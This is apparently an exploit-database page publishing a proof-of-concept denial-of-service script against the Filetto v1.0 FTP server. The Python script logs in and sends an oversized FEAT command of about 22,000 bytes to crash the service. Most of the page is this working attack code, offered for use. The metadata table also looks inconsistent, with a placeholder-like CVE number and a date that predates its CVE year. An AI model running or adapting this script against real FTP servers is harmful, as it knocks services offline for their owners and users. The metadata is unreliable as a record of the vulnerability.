Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-12345 | CWE-400 | Unknown | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2020-05-20 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | 0.02338 | 0.50416 |
# Exploit Title: Filetto v1.0 - 'FEAT' Denial of Service (PoC) # Date: [05-13-2020] # # Found by: Alvaro J. Gene (Socket_0x03) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www (dot) teraexe (dot) com # # Software Link: https://sourceforge.net/projects/filetto # Vulnerable Application: Filetto # Version: 1.0 (last version. Updated: 01/31/2020) # Server: FTP Server # Vulnerable Command: FEAT # Tested on: Windows XP SP2 and Windows 7 SP1. from socket import * host = "192.168.0.14" port = 2021 username = "Socket_0x03" password = "password" s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) print s.recv(1024) s.send("USER %s\r\n" % (username)) print s.recv(1024) s.send("PASS %s\r\n" % (password)) print s.recv(1024) buffer = "FEAT " buffer += "\x41\x2c" * 11008 buffer += "\r\n" s.send(buffer) print s.recv(1024) s.close()
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.